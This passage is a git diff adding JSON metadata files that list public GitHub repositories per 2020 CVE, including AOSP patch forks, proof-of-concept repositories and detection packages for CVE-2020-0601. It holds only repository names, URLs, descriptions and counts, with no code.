"visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0413.json b/2020/CVE-2020-0413.json new file mode 100644 index 0000000000..b82b392617 --- /dev/null +++ b/2020/CVE-2020-0413.json @@ -0,0 +1,33 @@ +[ + { + "id": 477552024, + "name": "system_bt_AOSP10_r33_CVE-2020-0413", + "full_name": "Satheesh575555\/system_bt_AOSP10_r33_CVE-2020-0413", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/system_bt_AOSP10_r33_CVE-2020-0413", + "description": null, + "fork": false, + "created_at": "2022-04-04T04:44:39Z", + "updated_at": "2023-08-29T14:42:24Z", + "pushed_at": "2022-04-04T04:48:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0416.json b/2020/CVE-2020-0416.json new file mode 100644 index 0000000000..9c132b6430 --- /dev/null +++ b/2020/CVE-2020-0416.json @@ -0,0 +1,64 @@ +[ + { + "id": 483359018, + "name": "packages_apps_settings_AOSP10_r33_CVE-2020-0416", + "full_name": "ShaikUsaf\/packages_apps_settings_AOSP10_r33_CVE-2020-0416", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/packages_apps_settings_AOSP10_r33_CVE-2020-0416", + "description": null, + "fork": false, + "created_at": "2022-04-19T18:12:43Z", + "updated_at": "2022-04-19T18:16:29Z", + "pushed_at": "2022-04-19T18:16:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 529130844, + "name": "packages_apps_Settings_AOSP10_r33_CVE-2020-0416", + "full_name": "Satheesh575555\/packages_apps_Settings_AOSP10_r33_CVE-2020-0416", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/packages_apps_Settings_AOSP10_r33_CVE-2020-0416", + "description": null, + "fork": false, + "created_at": "2022-08-26T05:44:57Z", + "updated_at": "2023-03-27T01:48:15Z", + "pushed_at": "2022-08-26T06:24:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0418.json b/2020/CVE-2020-0418.json new file mode 100644 index 0000000000..275e4c4795 --- /dev/null +++ b/2020/CVE-2020-0418.json @@ -0,0 +1,64 @@ +[ + { + "id": 487198514, + "name": "packages_apps_PackageInstaller_AOSP10_r33_CVE-2020-0418", + "full_name": "Trinadh465\/packages_apps_PackageInstaller_AOSP10_r33_CVE-2020-0418", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_PackageInstaller_AOSP10_r33_CVE-2020-0418", + "description": null, + "fork": false, + "created_at": "2022-04-30T06:16:17Z", + "updated_at": "2022-04-30T06:18:28Z", + "pushed_at": "2022-04-30T06:19:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 605678403, + "name": "CVE-2020-0418", + "full_name": "fernandodruszcz\/CVE-2020-0418", + "owner": { + "login": "fernandodruszcz", + "id": 55147100, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55147100?v=4", + "html_url": "https:\/\/github.com\/fernandodruszcz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fernandodruszcz\/CVE-2020-0418", + "description": null, + "fork": false, + "created_at": "2023-02-23T17:05:42Z", + "updated_at": "2023-02-23T17:08:36Z", + "pushed_at": "2023-02-23T17:18:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0421.json b/2020/CVE-2020-0421.json new file mode 100644 index 0000000000..21b1e4cf48 --- /dev/null +++ b/2020/CVE-2020-0421.json @@ -0,0 +1,33 @@ +[ + { + "id": 476202327, + "name": "system_core_AOSP10_r33_CVE-2020-0421", + "full_name": "nanopathi\/system_core_AOSP10_r33_CVE-2020-0421", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/system_core_AOSP10_r33_CVE-2020-0421", + "description": null, + "fork": false, + "created_at": "2022-03-31T07:42:58Z", + "updated_at": "2022-03-31T07:47:58Z", + "pushed_at": "2022-03-31T07:48:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0423.json b/2020/CVE-2020-0423.json new file mode 100644 index 0000000000..a0b859c0e2 --- /dev/null +++ b/2020/CVE-2020-0423.json @@ -0,0 +1,33 @@ +[ + { + "id": 774128871, + "name": "CVE-2020-0423", + "full_name": "sparrow-labz\/CVE-2020-0423", + "owner": { + "login": "sparrow-labz", + "id": 27852896, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27852896?v=4", + "html_url": "https:\/\/github.com\/sparrow-labz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sparrow-labz\/CVE-2020-0423", + "description": "Researching CVE published originally by longterm.io", + "fork": false, + "created_at": "2024-03-19T01:47:28Z", + "updated_at": "2024-11-27T03:36:00Z", + "pushed_at": "2024-04-11T15:04:05Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0439.json b/2020/CVE-2020-0439.json new file mode 100644 index 0000000000..f8a0e09d29 --- /dev/null +++ b/2020/CVE-2020-0439.json @@ -0,0 +1,33 @@ +[ + { + "id": 480326849, + "name": "frameworks_base_AOSP10_r33_CVE-2020-0439", + "full_name": "Satheesh575555\/frameworks_base_AOSP10_r33_CVE-2020-0439", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/frameworks_base_AOSP10_r33_CVE-2020-0439", + "description": null, + "fork": false, + "created_at": "2022-04-11T10:13:43Z", + "updated_at": "2023-03-27T01:17:46Z", + "pushed_at": "2022-04-11T10:38:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0443.json b/2020/CVE-2020-0443.json new file mode 100644 index 0000000000..f70e6651fa --- /dev/null +++ b/2020/CVE-2020-0443.json @@ -0,0 +1,33 @@ +[ + { + "id": 470010873, + "name": "CVE-2020-0443", + "full_name": "Supersonic\/CVE-2020-0443", + "owner": { + "login": "Supersonic", + "id": 36431699, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36431699?v=4", + "html_url": "https:\/\/github.com\/Supersonic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Supersonic\/CVE-2020-0443", + "description": "Proof of concept app for Android permanent denial-of-service vulnerability CVE-2020-0443", + "fork": false, + "created_at": "2022-03-15T04:54:31Z", + "updated_at": "2024-05-01T15:39:57Z", + "pushed_at": "2022-03-15T05:15:48Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0451.json b/2020/CVE-2020-0451.json new file mode 100644 index 0000000000..98da8a20bd --- /dev/null +++ b/2020/CVE-2020-0451.json @@ -0,0 +1,33 @@ +[ + { + "id": 476653956, + "name": "external_aac_AOSP10_r33_CVE-2020-0451", + "full_name": "nanopathi\/external_aac_AOSP10_r33_CVE-2020-0451", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/external_aac_AOSP10_r33_CVE-2020-0451", + "description": null, + "fork": false, + "created_at": "2022-04-01T09:20:38Z", + "updated_at": "2022-04-01T09:25:32Z", + "pushed_at": "2022-04-01T09:26:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0452.json b/2020/CVE-2020-0452.json new file mode 100644 index 0000000000..5af29b4870 --- /dev/null +++ b/2020/CVE-2020-0452.json @@ -0,0 +1,33 @@ +[ + { + "id": 486546241, + "name": "external_libexif_AOSP10_CVE-2020-0452", + "full_name": "ShaikUsaf\/external_libexif_AOSP10_CVE-2020-0452", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/external_libexif_AOSP10_CVE-2020-0452", + "description": null, + "fork": false, + "created_at": "2022-04-28T10:23:41Z", + "updated_at": "2022-04-28T10:27:50Z", + "pushed_at": "2022-04-28T10:29:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0453.json b/2020/CVE-2020-0453.json new file mode 100644 index 0000000000..940af9d156 --- /dev/null +++ b/2020/CVE-2020-0453.json @@ -0,0 +1,95 @@ +[ + { + "id": 475306049, + "name": "Nfc_CVE-2020-0453", + "full_name": "pazhanivel07\/Nfc_CVE-2020-0453", + "owner": { + "login": "pazhanivel07", + "id": 97434034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4", + "html_url": "https:\/\/github.com\/pazhanivel07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazhanivel07\/Nfc_CVE-2020-0453", + "description": null, + "fork": false, + "created_at": "2022-03-29T06:17:38Z", + "updated_at": "2022-03-29T06:22:17Z", + "pushed_at": "2022-03-29T06:23:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 475342208, + "name": "Packages_apps_Nfc_CVE-2020-0453", + "full_name": "nanopathi\/Packages_apps_Nfc_CVE-2020-0453", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/Packages_apps_Nfc_CVE-2020-0453", + "description": null, + "fork": false, + "created_at": "2022-03-29T08:06:46Z", + "updated_at": "2022-03-29T08:11:52Z", + "pushed_at": "2022-03-29T11:07:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 486600061, + "name": "packages_apps_Nfc_AOSP10_r33_CVE-2020-0453", + "full_name": "Trinadh465\/packages_apps_Nfc_AOSP10_r33_CVE-2020-0453", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_Nfc_AOSP10_r33_CVE-2020-0453", + "description": null, + "fork": false, + "created_at": "2022-04-28T13:12:23Z", + "updated_at": "2022-04-28T13:16:53Z", + "pushed_at": "2022-04-28T13:17:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0458.json b/2020/CVE-2020-0458.json new file mode 100644 index 0000000000..53cf49002d --- /dev/null +++ b/2020/CVE-2020-0458.json @@ -0,0 +1,33 @@ +[ + { + "id": 483930651, + "name": "system_media_AOSP10_r33_CVE-2020-0458", + "full_name": "nanopathi\/system_media_AOSP10_r33_CVE-2020-0458", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/system_media_AOSP10_r33_CVE-2020-0458", + "description": null, + "fork": false, + "created_at": "2022-04-21T06:20:46Z", + "updated_at": "2022-04-21T06:24:30Z", + "pushed_at": "2022-04-21T06:25:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0463.json b/2020/CVE-2020-0463.json new file mode 100644 index 0000000000..3d0898385b --- /dev/null +++ b/2020/CVE-2020-0463.json @@ -0,0 +1,33 @@ +[ + { + "id": 476188143, + "name": "system_bt_AOSP10_r33_CVE-2020-0463", + "full_name": "nanopathi\/system_bt_AOSP10_r33_CVE-2020-0463", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/system_bt_AOSP10_r33_CVE-2020-0463", + "description": null, + "fork": false, + "created_at": "2022-03-31T06:59:38Z", + "updated_at": "2022-03-31T07:06:56Z", + "pushed_at": "2022-03-31T07:07:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0471.json b/2020/CVE-2020-0471.json new file mode 100644 index 0000000000..e89c98877a --- /dev/null +++ b/2020/CVE-2020-0471.json @@ -0,0 +1,33 @@ +[ + { + "id": 477579346, + "name": "system_bt_AOSP10_r33_CVE-2020-0471", + "full_name": "nanopathi\/system_bt_AOSP10_r33_CVE-2020-0471", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/system_bt_AOSP10_r33_CVE-2020-0471", + "description": null, + "fork": false, + "created_at": "2022-04-04T06:41:12Z", + "updated_at": "2022-04-04T06:49:18Z", + "pushed_at": "2022-04-04T06:45:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0551.json b/2020/CVE-2020-0551.json new file mode 100644 index 0000000000..58ae37da96 --- /dev/null +++ b/2020/CVE-2020-0551.json @@ -0,0 +1,33 @@ +[ + { + "id": 246358905, + "name": "lvi-lfb-attack-poc", + "full_name": "bitdefender\/lvi-lfb-attack-poc", + "owner": { + "login": "bitdefender", + "id": 32452258, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32452258?v=4", + "html_url": "https:\/\/github.com\/bitdefender", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bitdefender\/lvi-lfb-attack-poc", + "description": "This repository contains the sources and documentation for the LVI-LFB Control Flow Hijacking attack PoC (CVE-2020-0551)", + "fork": false, + "created_at": "2020-03-10T17:00:01Z", + "updated_at": "2024-11-26T14:18:24Z", + "pushed_at": "2020-03-10T17:10:12Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 25, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0557.json b/2020/CVE-2020-0557.json new file mode 100644 index 0000000000..a558038dba --- /dev/null +++ b/2020/CVE-2020-0557.json @@ -0,0 +1,33 @@ +[ + { + "id": 255745863, + "name": "CVE-2020-0557_INTEL-SA-00338", + "full_name": "hessandrew\/CVE-2020-0557_INTEL-SA-00338", + "owner": { + "login": "hessandrew", + "id": 45692132, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45692132?v=4", + "html_url": "https:\/\/github.com\/hessandrew", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hessandrew\/CVE-2020-0557_INTEL-SA-00338", + "description": "https:\/\/www.intel.com\/content\/www\/us\/en\/security-center\/advisory\/intel-sa-00338.html", + "fork": false, + "created_at": "2020-04-14T22:51:34Z", + "updated_at": "2024-08-12T20:00:12Z", + "pushed_at": "2020-04-14T22:51:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0568.json b/2020/CVE-2020-0568.json new file mode 100644 index 0000000000..915515db08 --- /dev/null +++ b/2020/CVE-2020-0568.json @@ -0,0 +1,33 @@ +[ + { + "id": 255745689, + "name": "CVE-2020-0568_INTEL-SA-00344", + "full_name": "hessandrew\/CVE-2020-0568_INTEL-SA-00344", + "owner": { + "login": "hessandrew", + "id": 45692132, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45692132?v=4", + "html_url": "https:\/\/github.com\/hessandrew", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hessandrew\/CVE-2020-0568_INTEL-SA-00344", + "description": "https:\/\/www.intel.com\/content\/www\/us\/en\/security-center\/advisory\/intel-sa-00344.html", + "fork": false, + "created_at": "2020-04-14T22:50:36Z", + "updated_at": "2024-08-12T20:00:11Z", + "pushed_at": "2020-04-14T22:50:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0601.json b/2020/CVE-2020-0601.json new file mode 100644 index 0000000000..f2f3fd711a --- /dev/null +++ b/2020/CVE-2020-0601.json @@ -0,0 +1,1141 @@ +[ + { + "id": 233959211, + "name": "CVE-2020-0601", + "full_name": "nissan-sudo\/CVE-2020-0601", + "owner": { + "login": "nissan-sudo", + "id": 58976920, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58976920?v=4", + "html_url": "https:\/\/github.com\/nissan-sudo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nissan-sudo\/CVE-2020-0601", + "description": "Remote Code Execution Exploit ", + "fork": false, + "created_at": "2020-01-14T23:53:18Z", + "updated_at": "2024-08-12T19:56:38Z", + "pushed_at": "2020-01-14T23:56:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 233960159, + "name": "cve-2020-0601", + "full_name": "0xxon\/cve-2020-0601", + "owner": { + "login": "0xxon", + "id": 1538460, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1538460?v=4", + "html_url": "https:\/\/github.com\/0xxon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xxon\/cve-2020-0601", + "description": "Zeek package to detect CVE-2020-0601", + "fork": false, + "created_at": "2020-01-15T00:01:29Z", + "updated_at": "2024-08-12T19:56:38Z", + "pushed_at": "2022-07-09T06:50:09Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 35, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 234134766, + "name": "CVE-2020-0601", + "full_name": "SherlockSec\/CVE-2020-0601", + "owner": { + "login": "SherlockSec", + "id": 37545173, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37545173?v=4", + "html_url": "https:\/\/github.com\/SherlockSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SherlockSec\/CVE-2020-0601", + "description": "A Windows Crypto Exploit", + "fork": false, + "created_at": "2020-01-15T17:26:58Z", + "updated_at": "2020-01-16T20:56:07Z", + "pushed_at": "2020-01-15T17:28:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2020-0601", + "exploit", + "windows" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 234146234, + "name": "CVE-2020-0601", + "full_name": "JPurrier\/CVE-2020-0601", + "owner": { + "login": "JPurrier", + "id": 25715340, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25715340?v=4", + "html_url": "https:\/\/github.com\/JPurrier", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JPurrier\/CVE-2020-0601", + "description": null, + "fork": false, + "created_at": "2020-01-15T18:31:30Z", + "updated_at": "2024-08-12T19:56:40Z", + "pushed_at": "2020-01-17T10:49:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 234190972, + "name": "cve-2020-0601-plugin", + "full_name": "0xxon\/cve-2020-0601-plugin", + "owner": { + "login": "0xxon", + "id": 1538460, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1538460?v=4", + "html_url": "https:\/\/github.com\/0xxon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xxon\/cve-2020-0601-plugin", + "description": "Zeek package that uses OpenSSL to detect CVE-2020-0601 exploit attempts", + "fork": false, + "created_at": "2020-01-15T23:07:02Z", + "updated_at": "2024-08-12T19:56:40Z", + "pushed_at": "2020-02-12T19:38:35Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 234191063, + "name": "CurveBall", + "full_name": "ly4k\/CurveBall", + "owner": { + "login": "ly4k", + "id": 53348818, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53348818?v=4", + "html_url": "https:\/\/github.com\/ly4k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ly4k\/CurveBall", + "description": "PoC for CVE-2020-0601- Windows CryptoAPI (Crypt32.dll)", + "fork": false, + "created_at": "2020-01-15T23:07:41Z", + "updated_at": "2024-09-13T00:18:47Z", + "pushed_at": "2020-01-20T23:33:19Z", + "stargazers_count": 886, + "watchers_count": 886, + "has_discussions": false, + "forks_count": 268, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-0601" + ], + "visibility": "public", + "forks": 268, + "watchers": 886, + "score": 0, + "subscribers_count": 33 + }, + { + "id": 234192123, + "name": "chainoffools", + "full_name": "kudelskisecurity\/chainoffools", + "owner": { + "login": "kudelskisecurity", + "id": 10771090, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10771090?v=4", + "html_url": "https:\/\/github.com\/kudelskisecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kudelskisecurity\/chainoffools", + "description": "A PoC for CVE-2020-0601", + "fork": false, + "created_at": "2020-01-15T23:15:32Z", + "updated_at": "2024-08-12T19:56:40Z", + "pushed_at": "2023-05-09T14:27:33Z", + "stargazers_count": 337, + "watchers_count": 337, + "has_discussions": false, + "forks_count": 85, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 85, + "watchers": 337, + "score": 0, + "subscribers_count": 24 + }, + { + "id": 234220195, + "name": "Awesome-CVE-2020-0601", + "full_name": "RrUZi\/Awesome-CVE-2020-0601", + "owner": { + "login": "RrUZi", + "id": 43235635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43235635?v=4", + "html_url": "https:\/\/github.com\/RrUZi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RrUZi\/Awesome-CVE-2020-0601", + "description": "😂An awesome curated list of repos for CVE-2020-0601.", + "fork": false, + "created_at": "2020-01-16T02:46:21Z", + "updated_at": "2024-08-12T19:56:41Z", + "pushed_at": "2020-02-02T02:29:23Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "awesome", + "cryptoapi", + "cve-2020-0601", + "windows-10" + ], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 234317211, + "name": "CVE-2020-0601", + "full_name": "BlueTeamSteve\/CVE-2020-0601", + "owner": { + "login": "BlueTeamSteve", + "id": 550582, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/550582?v=4", + "html_url": "https:\/\/github.com\/BlueTeamSteve", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BlueTeamSteve\/CVE-2020-0601", + "description": "Curated list of CVE-2020-0601 resources", + "fork": false, + "created_at": "2020-01-16T12:40:48Z", + "updated_at": "2024-08-12T19:56:42Z", + "pushed_at": "2020-02-03T21:24:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "chainoffools", + "curveball", + "cve-2020-0601" + ], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 234433419, + "name": "badecparams", + "full_name": "saleemrashid\/badecparams", + "owner": { + "login": "saleemrashid", + "id": 22301423, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22301423?v=4", + 